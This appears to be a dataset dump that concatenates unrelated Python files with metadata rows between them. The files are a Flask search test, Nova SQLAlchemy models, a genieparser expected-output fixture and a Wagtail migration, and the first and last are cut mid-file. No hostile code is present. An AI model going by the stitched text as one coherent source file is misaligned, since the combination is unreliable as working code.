response = self.app.post('/service/search', data=json.dumps({"q":".shipped:=true _bucket:orders"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'.shipped:=true _bucket:orders', u'documents': [{u'_id': u'002', u'billing': {u'city': u'pittsburgh', u'state': u'pa'}, u'_score': 1.344435, u'shipping': {u'city': u'los angeles', u'state': u'ca', u'shipped': True}, u'_bucket': u'orders', u'order_date': u'Jul/12/2015', u'total': 200}], u'num_results': 1}, "Actual Response : %r" % json_response
def test_service_search_57_query_boolean_operator(self):
self.run_before_service_searcher_tests_boolean_field_search()
response = self.app.post('/service/search', data=json.dumps({"q":".shipped:=false _bucket:orders"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'.shipped:=false _bucket:orders', u'documents': [{u'_id': u'006', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 1.671488, u'shipping': {u'city': u'florida', u'state': u'fl', u'cost': 84.32, u'shipped': False}, u'_bucket': u'orders', u'order_date': u'Oct/01/2015', u'total': 50}], u'num_results': 1}, "Actual Response : %r" % json_response
| 92.144026 | 1,731 | 0.668028 | 8,301 | 56,300 | 4.31442 | 0.03602 | 0.115932 | 0.059474 | 0.075334 | 0.940973 | 0.934858 | 0.929636 | 0.924638 | 0.920003 | 0.914838 | 0 | 0.041576 | 0.131474 | 56,300 | 610 | 1,732 | 92.295082 | 0.690846 | 0.003144 | 0 | 0.601485 | 0 | 0.044554 | 0.355059 | 0.008626 | 0 | 0 | 0 | 0 | 0.351485 | 1 | 0.153465 | false | 0 | 0.004951 | 0 | 0.160891 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a481ccfef841c54a4a9cfcc2aea3992442acf0b2 | 20,919 | py | Python | nova/db/sqlalchemy/api_models.py | bopopescu/nova-token | ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2 | [
"Apache-2.0"
] | null | null | null | nova/db/sqlalchemy/api_models.py | bopopescu/nova-token | ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2 | [
"Apache-2.0"
] | null | null | null | nova/db/sqlalchemy/api_models.py | bopopescu/nova-token | ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2 | [
"Apache-2.0"
] | 2 | 2017-07-20T17:31:34.000Z | 2020-07-24T02:42:19.000Z | begin_unit
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.


from oslo_db.sqlalchemy import models
from sqlalchemy import Boolean
from sqlalchemy import Column
from sqlalchemy import Enum
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Float
from sqlalchemy import ForeignKey
from sqlalchemy import Index
from sqlalchemy import Integer
from sqlalchemy import orm
from sqlalchemy.orm import backref
from sqlalchemy import schema
from sqlalchemy import String
from sqlalchemy import Text

from nova.db.sqlalchemy import types


class _NovaAPIBase(models.ModelBase, models.TimestampMixin):
    pass


API_BASE = declarative_base(cls=_NovaAPIBase)


class CellMapping(API_BASE):
    """Contains information on communicating with a cell"""
    __tablename__ = 'cell_mappings'
    __table_args__ = (Index('uuid_idx', 'uuid'),
                      schema.UniqueConstraint('uuid',
                          name='uniq_cell_mappings0uuid'))

    id = Column(Integer, primary_key=True)
    uuid = Column(String(36), nullable=False)
    name = Column(String(255))
    transport_url = Column(Text())
    database_connection = Column(Text())
    host_mapping = orm.relationship('HostMapping',
                                    backref=backref('cell_mapping',
                                                    uselist=False),
                                    foreign_keys=id,
                                    primaryjoin=(
                                        'CellMapping.id == HostMapping.cell_id'))


class InstanceMapping(API_BASE):
    """Contains the mapping of an instance to which cell it is in"""
    __tablename__ = 'instance_mappings'
    __table_args__ = (Index('project_id_idx', 'project_id'),
                      Index('instance_uuid_idx', 'instance_uuid'),
                      schema.UniqueConstraint('instance_uuid',
                          name='uniq_instance_mappings0instance_uuid'))

    id = Column(Integer, primary_key=True)
    instance_uuid = Column(String(36), nullable=False)
    cell_id = Column(Integer, ForeignKey('cell_mappings.id'),
                     nullable=True)
    project_id = Column(String(255), nullable=False)
    cell_mapping = orm.relationship('CellMapping',
                                    backref=backref('instance_mapping',
                                                    uselist=False),
                                    foreign_keys=cell_id,
                                    primaryjoin=(
                                        'InstanceMapping.cell_id == CellMapping.id'))


class HostMapping(API_BASE):
    """Contains mapping of a compute host to which cell it is in"""
    __tablename__ = "host_mappings"
    __table_args__ = (Index('host_idx', 'host'),
                      schema.UniqueConstraint('host',
                          name='uniq_host_mappings0host'))

    id = Column(Integer, primary_key=True)
    cell_id = Column(Integer, ForeignKey('cell_mappings.id'),
                     nullable=False)
    host = Column(String(255), nullable=False)


class RequestSpec(API_BASE):
    """Represents the information passed to the scheduler."""

    __tablename__ = 'request_specs'
    __table_args__ = (
        Index('request_spec_instance_uuid_idx', 'instance_uuid'),
        schema.UniqueConstraint('instance_uuid',
                                name='uniq_request_specs0instance_uuid'),
    )

    id = Column(Integer, primary_key=True)
    instance_uuid = Column(String(36), nullable=False)
    spec = Column(Text, nullable=False)
    build_request = orm.relationship('BuildRequest',
                                     back_populates='request_spec',
                                     uselist=False,
                                     primaryjoin=(
                                         'RequestSpec.id == BuildRequest.request_spec_id'))


class Flavors(API_BASE):
    """Represents possible flavors for instances"""
    __tablename__ = 'flavors'
    __table_args__ = (
        schema.UniqueConstraint("flavorid", name="uniq_flavors0flavorid"),
        schema.UniqueConstraint("name", name="uniq_flavors0name"))

    id = Column(Integer, primary_key=True)
    name = Column(String(255), nullable=False)
    memory_mb = Column(Integer, nullable=False)
    vcpus = Column(Integer, nullable=False)
    root_gb = Column(Integer)
    ephemeral_gb = Column(Integer)
    flavorid = Column(String(255), nullable=False)
    swap = Column(Integer, nullable=False, default=0)
    rxtx_factor = Column(Float, default=1)
    vcpu_weight = Column(Integer)
    disabled = Column(Boolean, default=False)
    is_public = Column(Boolean, default=True)


class FlavorExtraSpecs(API_BASE):
    """Represents additional specs as key/value pairs for a flavor"""
    __tablename__ = 'flavor_extra_specs'
    __table_args__ = (
        Index('flavor_extra_specs_flavor_id_key_idx', 'flavor_id', 'key'),
        schema.UniqueConstraint('flavor_id', 'key',
            name='uniq_flavor_extra_specs0flavor_id0key'),
        {'mysql_collate': 'utf8_bin'},
    )

    id = Column(Integer, primary_key=True)
    key = Column(String(255), nullable=False)
    value = Column(String(255))
    flavor_id = Column(Integer, ForeignKey('flavors.id'), nullable=False)
    flavor = orm.relationship(Flavors, backref='extra_specs',
                              foreign_keys=flavor_id,
                              primaryjoin=(
                                  'FlavorExtraSpecs.flavor_id == Flavors.id'))


class FlavorProjects(API_BASE):
    """Represents projects associated with flavors"""
    __tablename__ = 'flavor_projects'
    __table_args__ = (schema.UniqueConstraint('flavor_id', 'project_id',
                          name='uniq_flavor_projects0flavor_id0project_id'),)

    id = Column(Integer, primary_key=True)
    flavor_id = Column(Integer, ForeignKey('flavors.id'), nullable=False)
    project_id = Column(String(255), nullable=False)
    flavor = orm.relationship(Flavors, backref='projects',
                              foreign_keys=flavor_id,
                              primaryjoin=(
                                  'FlavorProjects.flavor_id == Flavors.id'))


class BuildRequest(API_BASE):
    """Represents the information passed to the scheduler."""

    __tablename__ = 'build_requests'
    __table_args__ = (
        Index('build_requests_instance_uuid_idx', 'instance_uuid'),
        Index('build_requests_project_id_idx', 'project_id'),
        schema.UniqueConstraint('instance_uuid',
                                name='uniq_build_requests0instance_uuid'),
        schema.UniqueConstraint('request_spec_id',
                                name='uniq_build_requests0request_spec_id')
    )

    id = Column(Integer, primary_key=True)
    request_spec_id = Column(Integer, ForeignKey('request_specs.id'),
                             nullable=False)
    request_spec = orm.relationship(RequestSpec,
                                    foreign_keys=request_spec_id,
                                    back_populates='build_request',
                                    primaryjoin=request_spec_id == RequestSpec.id)
    instance_uuid = Column(String(36))
    project_id = Column(String(255), nullable=False)
    user_id = Column(String(255), nullable=False)
    display_name = Column(String(255))
    instance_metadata = Column(Text)
    progress = Column(Integer)
    vm_state = Column(String(255))
    task_state = Column(String(255))
    image_ref = Column(String(255))
    access_ip_v4 = Column(types.IPAddress())
    access_ip_v6 = Column(types.IPAddress())
    info_cache = Column(Text)
    security_groups = Column(Text, nullable=False)
    config_drive = Column(Boolean, default=False, nullable=False)
    key_name = Column(String(255))
    locked_by = Column(Enum('owner', 'admin'))
    instance = Column(Text)


class KeyPair(API_BASE):
    """Represents a public key pair for ssh / WinRM."""
    __tablename__ = 'key_pairs'
    __table_args__ = (
        schema.UniqueConstraint("user_id", "name",
                                name="uniq_key_pairs0user_id0name"),
    )
    id = Column(Integer, primary_key=True, nullable=False)

    name = Column(String(255), nullable=False)

    user_id = Column(String(255), nullable=False)

    fingerprint = Column(String(255))
    public_key = Column(Text())
    type = Column(Enum('ssh', 'x509', name='keypair_types'),
                  nullable=False, server_default='ssh')
end_unit
| 13.349713 | 88 | 0.643578 | 3,033 | 20,919 | 4.310584 | 0.076492 | 0.124828 | 0.110372 | 0.107083 | 0.781092 | 0.760594 | 0.745602 | 0.729769 | 0.704528 | 0.641273 | 0 | 0.004705 | 0.085568 | 20,919 | 1,566 | 89 | 13.358238 | 0.67876 | 0 | 0 | 0.88378 | 0 | 0 | 0.343707 | 0.027152 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.001916 | 0.009579 | null | null | 0.001277 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f104096f97c4af79b31ecc4422f4fd3e305f47a5 | 2,975 | py | Python | src/genie/libs/parser/iosxe/tests/ShowCtsRoleBasedCounters/cli/equal/golden_output1_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | 204 | 2018-06-27T00:55:27.000Z | 2022-03-06T21:12:18.000Z | src/genie/libs/parser/iosxe/tests/ShowCtsRoleBasedCounters/cli/equal/golden_output1_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | 468 | 2018-06-19T00:33:18.000Z | 2022-03-31T23:23:35.000Z | src/genie/libs/parser/iosxe/tests/ShowCtsRoleBasedCounters/cli/equal/golden_output1_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | 309 | 2019-01-16T20:21:07.000Z | 2022-03-30T12:56:41.000Z | expected_output = {
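    # Golden expected output for 'show cts role-based counters': each numbered
    # entry is one src/dst security-group pair with its software- and
    # hardware-path permit, deny and monitor counters.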
"cts_rb_count": {
1: {
"src_group": "*",
"dst_group": "*",
"sw_denied_count": 0,
"hw_denied_count": 0,
"sw_permit_count": 2,
"hw_permit_count": 30802626587,
"sw_monitor_count": 0,
"hw_monitor_count": 0,
},
2: {
"src_group": "2",
"dst_group": "0",
"sw_denied_count": 0,
"hw_denied_count": 4794060,
"sw_permit_count": 0,
"hw_permit_count": 0,
"sw_monitor_count": 0,
"hw_monitor_count": 0,
},
3: {
"src_group": "7",
"dst_group": "0",
"sw_denied_count": 0,
"hw_denied_count": 0,
"sw_permit_count": 0,
"hw_permit_count": 0,
"sw_monitor_count": 0,
"hw_monitor_count": 0,
},
4: {
"src_group": "99",
"dst_group": "0",
"sw_denied_count": 0,
"hw_denied_count": 0,
"sw_permit_count": 0,
"hw_permit_count": 0,
"sw_monitor_count": 0,
"hw_monitor_count": 0,
},
5: {
"src_group": "100",
"dst_group": "0",
"sw_denied_count": 0,
"hw_denied_count": 0,
"sw_permit_count": 0,
"hw_permit_count": 0,
"sw_monitor_count": 0,
"hw_monitor_count": 0,
},
6: {
"src_group": "103",
"dst_group": "0",
"sw_denied_count": 0,
"hw_denied_count": 0,
"sw_permit_count": 0,
"hw_permit_count": 0,
"sw_monitor_count": 0,
"hw_monitor_count": 0,
},
7: {
"src_group": "104",
"dst_group": "0",
"sw_denied_count": 0,
"hw_denied_count": 0,
"sw_permit_count": 0,
"hw_permit_count": 0,
"sw_monitor_count": 0,
"hw_monitor_count": 0,
},
8: {
"src_group": "2",
"dst_group": "2",
"sw_denied_count": 0,
"hw_denied_count": 4,
"sw_permit_count": 0,
"hw_permit_count": 0,
"sw_monitor_count": 0,
"hw_monitor_count": 0,
},
9: {
"src_group": "7",
"dst_group": "2",
"sw_denied_count": 0,
"hw_denied_count": 0,
"sw_permit_count": 0,
"hw_permit_count": 0,
"sw_monitor_count": 0,
"hw_monitor_count": 0,
},
10: {
"src_group": "99",
"dst_group": "2",
"sw_denied_count": 0,
"hw_denied_count": 0,
"sw_permit_count": 0,
"hw_permit_count": 0,
"sw_monitor_count": 0,
"hw_monitor_count": 0,
},
}
}
| 28.333333 | 43 | 0.416807 | 313 | 2,975 | 3.504792 | 0.095847 | 0.30629 | 0.211486 | 0.127621 | 0.893345 | 0.842297 | 0.842297 | 0.842297 | 0.81495 | 0.81495 | 0 | 0.068485 | 0.445378 | 2,975 | 104 | 44 | 28.605769 | 0.596364 | 0 | 0 | 0.682692 | 0 | 0 | 0.383193 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
f167a1644aaa28ed832593bd6a405fc7bf4179c1 | 25,822 | py | Python | iati_standard/migrations/0003_auto_20200512_1829.py | IATI/new-website | b90783e32d19ac4c821c5ea018a52997a11b5286 | [
"MIT"
] | 4 | 2019-03-28T06:42:17.000Z | 2021-06-06T13:10:51.000Z | iati_standard/migrations/0003_auto_20200512_1829.py | IATI/new-website | b90783e32d19ac4c821c5ea018a52997a11b5286 | [
"MIT"
] | 177 | 2018-09-28T14:21:56.000Z | 2022-03-30T21:45:26.000Z | iati_standard/migrations/0003_auto_20200512_1829.py | IATI/new-website | b90783e32d19ac4c821c5ea018a52997a11b5286 | [
"MIT"
] | 8 | 2018-10-25T20:43:10.000Z | 2022-03-17T14:19:27.000Z | # Generated by Django 2.2.12 on 2020-05-12 18:29
import django.contrib.postgres.fields.jsonb
from django.db import migrations, models
import django.db.models.deletion
import home.models
import modelcluster.fields
import wagtail.core.blocks
import wagtail.core.fields
import wagtail.documents.blocks
import wagtail.images.blocks
class Migration(migrations.Migration):
dependencies = [
('wagtailcore', '0045_assign_unlock_grouppagepermission'),
('wagtailimages', '0001_squashed_0021'),
('iati_standard', '0002_social_media'),
]
operations = [
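        # The per-language StreamField definitions below (en/fr/es/pt) are
        # repeated verbatim; this duplication is expected in auto-generated
        # Django/Wagtail migrations and should not be hand-edited.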
migrations.CreateModel(
name='ReferenceMenu',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('tag', models.CharField(help_text='Associated git release tag', max_length=255)),
('menu_json', django.contrib.postgres.fields.jsonb.JSONField()),
],
),
migrations.CreateModel(
name='StandardGuidancePage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('heading', models.CharField(blank=True, max_length=255, null=True)),
('heading_en', models.CharField(blank=True, max_length=255, null=True)),
('heading_fr', models.CharField(blank=True, max_length=255, null=True)),
('heading_es', models.CharField(blank=True, max_length=255, null=True)),
('heading_pt', models.CharField(blank=True, max_length=255, null=True)),
('excerpt', models.TextField(blank=True, null=True)),
('excerpt_en', models.TextField(blank=True, null=True)),
('excerpt_fr', models.TextField(blank=True, null=True)),
('excerpt_es', models.TextField(blank=True, null=True)),
('excerpt_pt', models.TextField(blank=True, null=True)),
('content_editor', wagtail.core.fields.StreamField([('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('image_figure', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock()), ('alignment', home.models.ImageAlignmentChoiceBlock()), ('caption', wagtail.core.blocks.RichTextBlock(required=False))], icon='image', label='Image figure')), ('pullquote', wagtail.core.blocks.StructBlock([('quote', wagtail.core.blocks.TextBlock('quote title'))])), ('aligned_html', wagtail.core.blocks.StructBlock([('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', home.models.HTMLAlignmentChoiceBlock())], icon='code', label='Raw HTML')), ('document_box', wagtail.core.blocks.StreamBlock([('document_box_heading', wagtail.core.blocks.CharBlock(classname='title', help_text='Only one heading per box.', icon='title', required=False)), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse', required=False))], icon='doc-full-inverse')), ('anchor_point', wagtail.core.blocks.CharBlock(help_text='Custom anchor points are expected to precede other content.', icon='order-down'))], blank=True, null=True)),
('content_editor_en', wagtail.core.fields.StreamField([('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('image_figure', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock()), ('alignment', home.models.ImageAlignmentChoiceBlock()), ('caption', wagtail.core.blocks.RichTextBlock(required=False))], icon='image', label='Image figure')), ('pullquote', wagtail.core.blocks.StructBlock([('quote', wagtail.core.blocks.TextBlock('quote title'))])), ('aligned_html', wagtail.core.blocks.StructBlock([('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', home.models.HTMLAlignmentChoiceBlock())], icon='code', label='Raw HTML')), ('document_box', wagtail.core.blocks.StreamBlock([('document_box_heading', wagtail.core.blocks.CharBlock(classname='title', help_text='Only one heading per box.', icon='title', required=False)), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse', required=False))], icon='doc-full-inverse')), ('anchor_point', wagtail.core.blocks.CharBlock(help_text='Custom anchor points are expected to precede other content.', icon='order-down'))], blank=True, null=True)),
('content_editor_fr', wagtail.core.fields.StreamField([('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('image_figure', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock()), ('alignment', home.models.ImageAlignmentChoiceBlock()), ('caption', wagtail.core.blocks.RichTextBlock(required=False))], icon='image', label='Image figure')), ('pullquote', wagtail.core.blocks.StructBlock([('quote', wagtail.core.blocks.TextBlock('quote title'))])), ('aligned_html', wagtail.core.blocks.StructBlock([('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', home.models.HTMLAlignmentChoiceBlock())], icon='code', label='Raw HTML')), ('document_box', wagtail.core.blocks.StreamBlock([('document_box_heading', wagtail.core.blocks.CharBlock(classname='title', help_text='Only one heading per box.', icon='title', required=False)), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse', required=False))], icon='doc-full-inverse')), ('anchor_point', wagtail.core.blocks.CharBlock(help_text='Custom anchor points are expected to precede other content.', icon='order-down'))], blank=True, null=True)),
('content_editor_es', wagtail.core.fields.StreamField([('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('image_figure', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock()), ('alignment', home.models.ImageAlignmentChoiceBlock()), ('caption', wagtail.core.blocks.RichTextBlock(required=False))], icon='image', label='Image figure')), ('pullquote', wagtail.core.blocks.StructBlock([('quote', wagtail.core.blocks.TextBlock('quote title'))])), ('aligned_html', wagtail.core.blocks.StructBlock([('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', home.models.HTMLAlignmentChoiceBlock())], icon='code', label='Raw HTML')), ('document_box', wagtail.core.blocks.StreamBlock([('document_box_heading', wagtail.core.blocks.CharBlock(classname='title', help_text='Only one heading per box.', icon='title', required=False)), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse', required=False))], icon='doc-full-inverse')), ('anchor_point', wagtail.core.blocks.CharBlock(help_text='Custom anchor points are expected to precede other content.', icon='order-down'))], blank=True, null=True)),
('content_editor_pt', wagtail.core.fields.StreamField([('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('image_figure', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock()), ('alignment', home.models.ImageAlignmentChoiceBlock()), ('caption', wagtail.core.blocks.RichTextBlock(required=False))], icon='image', label='Image figure')), ('pullquote', wagtail.core.blocks.StructBlock([('quote', wagtail.core.blocks.TextBlock('quote title'))])), ('aligned_html', wagtail.core.blocks.StructBlock([('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', home.models.HTMLAlignmentChoiceBlock())], icon='code', label='Raw HTML')), ('document_box', wagtail.core.blocks.StreamBlock([('document_box_heading', wagtail.core.blocks.CharBlock(classname='title', help_text='Only one heading per box.', icon='title', required=False)), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse', required=False))], icon='doc-full-inverse')), ('anchor_point', wagtail.core.blocks.CharBlock(help_text='Custom anchor points are expected to precede other content.', icon='order-down'))], blank=True, null=True)),
('ssot_path', models.TextField(blank=True, help_text='Folder path of SSOT object', null=True)),
('tag', models.CharField(help_text='Associated git release tag', max_length=255)),
('data', models.TextField(blank=True, help_text='HTML data for the page', null=True)),
('data_en', models.TextField(blank=True, help_text='HTML data for the page', null=True)),
('data_fr', models.TextField(blank=True, help_text='HTML data for the page', null=True)),
('data_es', models.TextField(blank=True, help_text='HTML data for the page', null=True)),
('data_pt', models.TextField(blank=True, help_text='HTML data for the page', null=True)),
('header_image', models.ForeignKey(blank=True, help_text='This is the image that will appear in the header banner at the top of the page. If no image is added a placeholder image will be used.', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
('social_media_image', models.ForeignKey(blank=True, help_text='This image will be used as the image for social media sharing cards.', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.AddField(
model_name='iatistandardpage',
name='how_to_use_page',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailcore.Page'),
),
migrations.AddField(
model_name='iatistandardpage',
name='live_tag',
field=models.CharField(blank=True, help_text='Associated git release tag', max_length=255, null=True),
),
migrations.AddField(
model_name='iatistandardpage',
name='reference_cards',
field=wagtail.core.fields.StreamField([('card', wagtail.core.blocks.StructBlock([('major_header', wagtail.core.blocks.CharBlock(help_text='Text for the header element of the card', required=False)), ('card_content', wagtail.core.blocks.StreamBlock([('minor_header', wagtail.core.blocks.CharBlock(icon='title', required=False, template='iati_standard/blocks/minor_header.html')), ('page_links', wagtail.core.blocks.StreamBlock([('page', wagtail.core.blocks.PageChooserBlock(required=False, template='iati_standard/blocks/page_link.html'))], template='iati_standard/blocks/page_links.html'))]))]))], blank=True, null=True),
),
migrations.AddField(
model_name='iatistandardpage',
name='reference_support_page',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailcore.Page'),
),
migrations.AddField(
model_name='iatistandardpage',
name='repo',
field=models.URLField(blank=True, help_text='Git repo URL', null=True),
),
migrations.AddField(
model_name='iatistandardpage',
name='static',
field=models.BooleanField(default=True, help_text='If true, retain static links. Otherwise use dynamic links.'),
),
migrations.CreateModel(
name='StandardGuidanceTypes',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
('guidance_type', models.CharField(max_length=100)),
('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='guidance_types', to='iati_standard.StandardGuidancePage')),
],
options={
'ordering': ['sort_order'],
'abstract': False,
},
),
migrations.CreateModel(
name='StandardGuidanceIndexPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('heading', models.CharField(blank=True, max_length=255, null=True)),
('excerpt', models.TextField(blank=True, null=True)),
('header_image', models.ForeignKey(blank=True, help_text='This is the image that will appear in the header banner at the top of the page. If no image is added a placeholder image will be used.', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
('social_media_image', models.ForeignKey(blank=True, help_text='This image will be used as the image for social media sharing cards.', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='ReferenceData',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('ssot_path', models.TextField(blank=True, help_text='Folder path of SSOT object', null=True)),
('tag', models.CharField(help_text='Associated git release tag', max_length=255)),
('language', models.CharField(default='en', help_text='Language', max_length=255)),
('ssot_root_slug', models.CharField(help_text='Slug of the highest parent folder.', max_length=255)),
('parent_path', models.TextField(blank=True, help_text='Parent path of object', null=True)),
('data', models.TextField(blank=True, help_text='HTML data for the page', null=True)),
],
options={
'verbose_name_plural': 'Reference data',
'ordering': ['ssot_path'],
'unique_together': {('ssot_path', 'tag')},
},
),
migrations.CreateModel(
name='ActivityStandardPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('heading', models.CharField(blank=True, max_length=255, null=True)),
('heading_en', models.CharField(blank=True, max_length=255, null=True)),
('heading_fr', models.CharField(blank=True, max_length=255, null=True)),
('heading_es', models.CharField(blank=True, max_length=255, null=True)),
('heading_pt', models.CharField(blank=True, max_length=255, null=True)),
('excerpt', models.TextField(blank=True, null=True)),
('excerpt_en', models.TextField(blank=True, null=True)),
('excerpt_fr', models.TextField(blank=True, null=True)),
('excerpt_es', models.TextField(blank=True, null=True)),
('excerpt_pt', models.TextField(blank=True, null=True)),
('content_editor', wagtail.core.fields.StreamField([('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('image_figure', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock()), ('alignment', home.models.ImageAlignmentChoiceBlock()), ('caption', wagtail.core.blocks.RichTextBlock(required=False))], icon='image', label='Image figure')), ('pullquote', wagtail.core.blocks.StructBlock([('quote', wagtail.core.blocks.TextBlock('quote title'))])), ('aligned_html', wagtail.core.blocks.StructBlock([('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', home.models.HTMLAlignmentChoiceBlock())], icon='code', label='Raw HTML')), ('document_box', wagtail.core.blocks.StreamBlock([('document_box_heading', wagtail.core.blocks.CharBlock(classname='title', help_text='Only one heading per box.', icon='title', required=False)), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse', required=False))], icon='doc-full-inverse')), ('anchor_point', wagtail.core.blocks.CharBlock(help_text='Custom anchor points are expected to precede other content.', icon='order-down'))], blank=True, null=True)),
